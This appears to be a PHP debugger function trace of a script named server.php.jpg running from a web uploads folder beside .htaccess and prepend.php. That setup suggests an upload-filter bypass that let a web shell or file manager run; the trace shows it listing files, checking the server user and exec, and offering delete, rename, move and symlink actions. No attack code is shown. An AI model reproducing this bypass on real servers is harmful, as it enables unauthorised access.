'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
3	203	0	0.012416	800056	listing	1		/var/www/html/uploads/server.php.jpg	1214	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	204	0	0.012621	800056	column_title	1		/var/www/html/uploads/server.php.jpg	1236	3	'filename'	'filename'	FALSE
5	205	0	0.012644	800056	urlencode	0		/var/www/html/uploads/server.php.jpg	1416	1	'/var/www/html/uploads/'
5	205	1	0.012662	800152
5	205	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.php.jpg	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.php.jpg	1418	$arr = ''
4		A						/var/www/html/uploads/server.php.jpg	1421	$r = '&amp;reverse=true'
4		A						/var/www/html/uploads/server.php.jpg	1422	$arr = ' &and;'
5	206	0	0.012745	800296	word	1		/var/www/html/uploads/server.php.jpg	1429	1	'filename'
6	207	0	0.012763	800296	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Filename'	2	'UTF-8'
6	207	1	0.012783	800568
6	207	R			'Filename'
5	206	1	0.012802	800456
5	206	R			'Filename'
4	204	1	0.012822	800056
4	208	0	0.012831	800056	column_title	1		/var/www/html/uploads/server.php.jpg	1237	3	'size'	'filename'	FALSE
5	209	0	0.012851	800056	urlencode	0		/var/www/html/uploads/server.php.jpg	1416	1	'/var/www/html/uploads/'
5	209	1	0.012869	800152
5	209	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.php.jpg	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.php.jpg	1418	$arr = ''
4		A						/var/www/html/uploads/server.php.jpg	1427	$r = ''
5	210	0	0.012933	800264	word	1		/var/www/html/uploads/server.php.jpg	1429	1	'size'
6	211	0	0.012950	800264	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Size'	2	'UTF-8'
6	211	1	0.012970	800536
6	211	R			'Size'
5	210	1	0.012988	800424
5	210	R			'Size'
4	208	1	0.013017	800168
4	212	0	0.013027	800168	column_title	1		/var/www/html/uploads/server.php.jpg	1240	3	'permission'	'filename'	FALSE
5	213	0	0.013047	800168	urlencode	0		/var/www/html/uploads/server.php.jpg	1416	1	'/var/www/html/uploads/'
5	213	1	0.013064	800264
5	213	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.php.jpg	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.php.jpg	1418	$arr = ''
4		A						/var/www/html/uploads/server.php.jpg	1427	$r = ''
5	214	0	0.013127	800408	word	1		/var/www/html/uploads/server.php.jpg	1429	1	'permission'
6	215	0	0.013144	800408	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Permission'	2	'UTF-8'
6	215	1	0.013164	800680
6	215	R			'Permission'
5	214	1	0.013183	800568
5	214	R			'Permission'
4	212	1	0.013202	800168
4	216	0	0.013211	800168	column_title	1		/var/www/html/uploads/server.php.jpg	1241	3	'owner'	'filename'	FALSE
5	217	0	0.013230	800168	urlencode	0		/var/www/html/uploads/server.php.jpg	1416	1	'/var/www/html/uploads/'
5	217	1	0.013247	800264
5	217	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.php.jpg	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.php.jpg	1418	$arr = ''
4		A						/var/www/html/uploads/server.php.jpg	1427	$r = ''
5	218	0	0.013309	800376	word	1		/var/www/html/uploads/server.php.jpg	1429	1	'owner'
6	219	0	0.013327	800376	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Owner'	2	'UTF-8'
6	219	1	0.013346	800648
6	219	R			'Owner'
5	218	1	0.013364	800536
5	218	R			'Owner'
4	216	1	0.013383	800168
4	220	0	0.013392	800168	column_title	1		/var/www/html/uploads/server.php.jpg	1242	3	'group'	'filename'	FALSE
5	221	0	0.013411	800168	urlencode	0		/var/www/html/uploads/server.php.jpg	1416	1	'/var/www/html/uploads/'
5	221	1	0.013428	800264
5	221	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4		A						/var/www/html/uploads/server.php.jpg	1416	$d = 'dir=%2Fvar%2Fwww%2Fhtml%2Fuploads%2F&amp;'
4		A						/var/www/html/uploads/server.php.jpg	1418	$arr = ''
4		A						/var/www/html/uploads/server.php.jpg	1427	$r = ''
5	222	0	0.013496	800376	word	1		/var/www/html/uploads/server.php.jpg	1429	1	'group'
6	223	0	0.013513	800376	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Group'	2	'UTF-8'
6	223	1	0.013532	800648
6	223	R			'Group'
5	222	1	0.013550	800536
5	222	R			'Group'
4	220	1	0.013568	800168
4	224	0	0.013577	800168	word	1		/var/www/html/uploads/server.php.jpg	1245	1	'functions'
5	225	0	0.013594	800168	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'Functions'	2	'UTF-8'
5	225	1	0.013614	800440
5	225	R			'Functions'
4	224	1	0.013632	800328
4	224	R			'Functions'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i = 0
4	226	0	0.013663	800168	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	226	1	0.013755	800200
4	226	R			6
3		A						/var/www/html/uploads/server.php.jpg	1250	$file = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	227	0	0.013809	800168	date	0		/var/www/html/uploads/server.php.jpg	1252	2	'n/j/y H:i:s'	1676243054
4	227	1	0.013895	802560
4	227	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1252	$timestamps = 'mtime: 2/12/23 18:04:14, '
4	228	0	0.013936	802288	date	0		/var/www/html/uploads/server.php.jpg	1253	2	'n/j/y H:i:s'	1676243054
4	228	1	0.013976	802616
4	228	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1253	$timestamps .= 'atime: 2/12/23 18:04:14, '
4	229	0	0.014014	802312	date	0		/var/www/html/uploads/server.php.jpg	1254	2	'n/j/y H:i:s'	1676243054
4	229	1	0.014048	802640
4	229	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1254	$timestamps .= 'ctime: 2/12/23 18:04:14'
4	230	0	0.014076	802536	html	1		/var/www/html/uploads/server.php.jpg	1258	1	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
5	231	0	0.014092	802536	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'	2	NULL
5	231	1	0.014110	802840
5	231	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	230	1	0.014126	802728
4	230	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	232	0	0.014144	802400	urlencode	0		/var/www/html/uploads/server.php.jpg	1281	1	'/var/www/html/uploads/.'
4	232	1	0.014162	802496
4	232	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F.'
4	233	0	0.014190	802440	html	1		/var/www/html/uploads/server.php.jpg	1281	1	'.'
5	234	0	0.014211	802440	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'.'	2	NULL
5	234	1	0.014235	802712
5	234	R			'.'
4	233	1	0.014256	802600
4	233	R			'.'
4	235	0	0.014275	802344	human_filesize	1		/var/www/html/uploads/server.php.jpg	1304	1	4096
4		A						/var/www/html/uploads/server.php.jpg	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.php.jpg	1155	$n = 0
4		A						/var/www/html/uploads/server.php.jpg	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.php.jpg	1158	$n++
5	236	0	0.014349	802344	strpos	0		/var/www/html/uploads/server.php.jpg	1161	2	4	'.'
5	236	1	0.014369	802416
5	236	R			FALSE
5	237	0	0.014388	802344	round	0		/var/www/html/uploads/server.php.jpg	1161	2	4	3
5	237	1	0.014404	802416
5	237	R			4
4		A						/var/www/html/uploads/server.php.jpg	1161	$filesize = 4
5	238	0	0.014436	802344	strpos	0		/var/www/html/uploads/server.php.jpg	1163	2	4	'.'
5	238	1	0.014456	802672
5	238	R			FALSE
5	239	0	0.014474	802344	substr	0		/var/www/html/uploads/server.php.jpg	1169	3	'kMGTPE'	0	1
5	239	1	0.014489	802440
5	239	R			'k'
4		A						/var/www/html/uploads/server.php.jpg	1169	$suffix = 'k'
4	235	1	0.014515	802376
4	235	R			'4 kB'
3		A						/var/www/html/uploads/server.php.jpg	1304	$human = ' title="4 kB"'
4	240	0	0.014547	802384	decoct	0		/var/www/html/uploads/server.php.jpg	1315	1	16895
4	240	1	0.014560	802456
4	240	R			'40777'
4	241	0	0.014574	802384	function_exists	0		/var/www/html/uploads/server.php.jpg	1317	1	'posix_getuid'
4	241	1	0.014588	802424
4	241	R			TRUE
4	242	0	0.014601	802384	posix_getuid	0		/var/www/html/uploads/server.php.jpg	1317	0
4	242	1	0.014614	802384
4	242	R			33
3		A						/var/www/html/uploads/server.php.jpg	1317	$l = FALSE
4	243	0	0.014638	802384	permission_octal2string	1		/var/www/html/uploads/server.php.jpg	1319	1	16895
4		A						/var/www/html/uploads/server.php.jpg	970	$type = 'd'
4		A						/var/www/html/uploads/server.php.jpg	979	$owner = 'r'
4		A						/var/www/html/uploads/server.php.jpg	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	987	$group = 'r'
4		A						/var/www/html/uploads/server.php.jpg	988	$group .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	992	$group .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	995	$other = 'r'
4		A						/var/www/html/uploads/server.php.jpg	996	$other .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	1000	$other .= 'x'
4	243	1	0.014753	802424
4	243	R			'drwxrwxrwx'
4	244	0	0.014767	802424	html	1		/var/www/html/uploads/server.php.jpg	1319	1	'drwxrwxrwx'
5	245	0	0.014780	802424	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'drwxrwxrwx'	2	NULL
5	245	1	0.014796	802696
5	245	R			'drwxrwxrwx'
4	244	1	0.014809	802584
4	244	R			'drwxrwxrwx'
4	246	0	0.014823	802384	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1324	2	'owner_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	246	1	0.014853	802448
4	246	R			TRUE
4	247	0	0.014867	802384	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1330	2	'group_name'	['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	247	1	0.014895	802448
4	247	R			TRUE
4	248	0	0.014909	802480	html	1		/var/www/html/uploads/server.php.jpg	1339	1	'/var/www/html/uploads/.'
5	249	0	0.014922	802480	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'/var/www/html/uploads/.'	2	NULL
5	249	1	0.014937	802752
5	249	R			'/var/www/html/uploads/.'
4	248	1	0.014952	802640
4	248	R			'/var/www/html/uploads/.'
3		A						/var/www/html/uploads/server.php.jpg	1342	$actions = []
4	250	0	0.014977	802384	function_exists	0		/var/www/html/uploads/server.php.jpg	1343	1	'symlink'
4	250	1	0.014990	802424
4	250	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1344	$actions[] = 'create_symlink'
4	251	0	0.015016	802760	dirname	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads/.'
4	251	1	0.015029	802840
4	251	R			'/var/www/html/uploads'
4	252	0	0.015043	802808	is_writable	0		/var/www/html/uploads/server.php.jpg	1346	1	'/var/www/html/uploads'
4	252	1	0.015064	802848
4	252	R			TRUE
3		A						/var/www/html/uploads/server.php.jpg	1347	$actions[] = 'delete'
3		A						/var/www/html/uploads/server.php.jpg	1348	$actions[] = 'rename'
3		A						/var/www/html/uploads/server.php.jpg	1349	$actions[] = 'move'
4	253	0	0.015109	802760	function_exists	0		/var/www/html/uploads/server.php.jpg	1356	1	'exec'
4	253	1	0.015133	802800
4	253	R			TRUE
4	254	0	0.015146	802760	sizeof	0		/var/www/html/uploads/server.php.jpg	1360	1	[0 => 'create_symlink', 1 => 'delete', 2 => 'rename', 3 => 'move']
4	254	1	0.015164	802792
4	254	R			4
4	255	0	0.015177	802856	str_repeat	0		/var/www/html/uploads/server.php.jpg	1363	2	'&nbsp;'	30
4	255	1	0.015191	803144
4	255	R			'&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'
4	256	0	0.015208	802824	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'create_symlink'
5	257	0	0.015222	802824	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'create symlink'	2	'UTF-8'
5	257	1	0.015242	803096
5	257	R			'create symlink'
4	256	1	0.015257	802984
4	256	R			'create symlink'
4	258	0	0.015272	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'delete'
5	259	0	0.015285	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'delete'	2	'UTF-8'
5	259	1	0.015300	803088
5	259	R			'delete'
4	258	1	0.015313	802976
4	258	R			'delete'
4	260	0	0.015327	802816	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'rename'
5	261	0	0.015339	802816	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'rename'	2	'UTF-8'
5	261	1	0.015354	803088
5	261	R			'rename'
4	260	1	0.015367	802976
4	260	R			'rename'
4	262	0	0.015381	802808	word	1		/var/www/html/uploads/server.php.jpg	1367	1	'move'
5	263	0	0.015394	802808	htmlentities	0		/var/www/html/uploads/server.php.jpg	1599	3	'move'	2	'UTF-8'
5	263	1	0.015408	803080
5	263	R			'move'
4	262	1	0.015422	802968
4	262	R			'move'
3		A						/var/www/html/uploads/server.php.jpg	1249	$i++
4	264	0	0.015446	802760	sizeof	0		/var/www/html/uploads/server.php.jpg	1249	1	[0 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => 'server.php.jpg', 'path' => '/var/www/html/uploads/server.php.jpg', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']]
4	264	1	0.015519	802792
4	264	R			6
3		A						/var/www/html/uploads/server.php.jpg	1250	$file = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	265	0	0.015560	802760	date	0		/var/www/html/uploads/server.php.jpg	1252	2	'n/j/y H:i:s'	1676243054
4	265	1	0.015597	803088
4	265	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1252	$timestamps = 'mtime: 2/12/23 18:04:14, '
4	266	0	0.015635	802704	date	0		/var/www/html/uploads/server.php.jpg	1253	2	'n/j/y H:i:s'	1676243054
4	266	1	0.015672	803032
4	266	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1253	$timestamps .= 'atime: 2/12/23 18:04:14, '
4	267	0	0.015710	802728	date	0		/var/www/html/uploads/server.php.jpg	1254	2	'n/j/y H:i:s'	1676243054
4	267	1	0.015749	803056
4	267	R			'2/12/23 18:04:14'
3		A						/var/www/html/uploads/server.php.jpg	1254	$timestamps .= 'ctime: 2/12/23 18:04:14'
4	268	0	0.015784	802952	html	1		/var/www/html/uploads/server.php.jpg	1258	1	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
5	269	0	0.015800	802952	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'	2	NULL
5	269	1	0.015817	803256
5	269	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	268	1	0.015833	803144
4	268	R			'mtime: 2/12/23 18:04:14, atime: 2/12/23 18:04:14, ctime: 2/12/23 18:04:14'
4	270	0	0.015851	802816	urlencode	0		/var/www/html/uploads/server.php.jpg	1281	1	'/var/www/html/uploads/..'
4	270	1	0.015865	802912
4	270	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F..'
4	271	0	0.015881	802856	html	1		/var/www/html/uploads/server.php.jpg	1281	1	'..'
5	272	0	0.015894	802856	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'..'	2	NULL
5	272	1	0.015908	803128
5	272	R			'..'
4	271	1	0.015921	803016
4	271	R			'..'
4	273	0	0.015936	802760	human_filesize	1		/var/www/html/uploads/server.php.jpg	1304	1	4096
4		A						/var/www/html/uploads/server.php.jpg	1153	$suffices = 'kMGTPE'
4		A						/var/www/html/uploads/server.php.jpg	1155	$n = 0
4		A						/var/www/html/uploads/server.php.jpg	1157	$filesize /= 1024
4		A						/var/www/html/uploads/server.php.jpg	1158	$n++
5	274	0	0.015991	802760	strpos	0		/var/www/html/uploads/server.php.jpg	1161	2	4	'.'
5	274	1	0.016005	802832
5	274	R			FALSE
5	275	0	0.016019	802760	round	0		/var/www/html/uploads/server.php.jpg	1161	2	4	3
5	275	1	0.016031	802832
5	275	R			4
4		A						/var/www/html/uploads/server.php.jpg	1161	$filesize = 4
5	276	0	0.016055	802760	strpos	0		/var/www/html/uploads/server.php.jpg	1163	2	4	'.'
5	276	1	0.016074	803088
5	276	R			FALSE
5	277	0	0.016089	802760	substr	0		/var/www/html/uploads/server.php.jpg	1169	3	'kMGTPE'	0	1
5	277	1	0.016104	802856
5	277	R			'k'
4		A						/var/www/html/uploads/server.php.jpg	1169	$suffix = 'k'
4	273	1	0.016128	802792
4	273	R			'4 kB'
3		A						/var/www/html/uploads/server.php.jpg	1304	$human = ' title="4 kB"'
4	278	0	0.016155	802760	decoct	0		/var/www/html/uploads/server.php.jpg	1315	1	16895
4	278	1	0.016168	802832
4	278	R			'40777'
4	279	0	0.016181	802760	function_exists	0		/var/www/html/uploads/server.php.jpg	1317	1	'posix_getuid'
4	279	1	0.016195	802800
4	279	R			TRUE
4	280	0	0.016212	802760	posix_getuid	0		/var/www/html/uploads/server.php.jpg	1317	0
4	280	1	0.016226	802760
4	280	R			33
3		A						/var/www/html/uploads/server.php.jpg	1317	$l = FALSE
4	281	0	0.016249	802760	permission_octal2string	1		/var/www/html/uploads/server.php.jpg	1319	1	16895
4		A						/var/www/html/uploads/server.php.jpg	970	$type = 'd'
4		A						/var/www/html/uploads/server.php.jpg	979	$owner = 'r'
4		A						/var/www/html/uploads/server.php.jpg	980	$owner .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	984	$owner .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	987	$group = 'r'
4		A						/var/www/html/uploads/server.php.jpg	988	$group .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	992	$group .= 'x'
4		A						/var/www/html/uploads/server.php.jpg	995	$other = 'r'
4		A						/var/www/html/uploads/server.php.jpg	996	$other .= 'w'
4		A						/var/www/html/uploads/server.php.jpg	1000	$other .= 'x'
4	281	1	0.016364	802800
4	281	R			'drwxrwxrwx'
4	282	0	0.016379	802800	html	1		/var/www/html/uploads/server.php.jpg	1319	1	'drwxrwxrwx'
5	283	0	0.016392	802800	htmlentities	0		/var/www/html/uploads/server.php.jpg	1594	3	'drwxrwxrwx'	2	NULL
5	283	1	0.016407	803072
5	283	R			'drwxrwxrwx'
4	282	1	0.016421	802960
4	282	R			'drwxrwxrwx'
4	284	0	0.016439	802760	array_key_exists	0		/var/www/html/uploads/server.php.jpg	1324	2	'owner_name'	['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243054, 'atime' => 1676243054, 'ctime' => 1676243054, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
4	284	1	0.016498	802824
4	284	R			TRUE
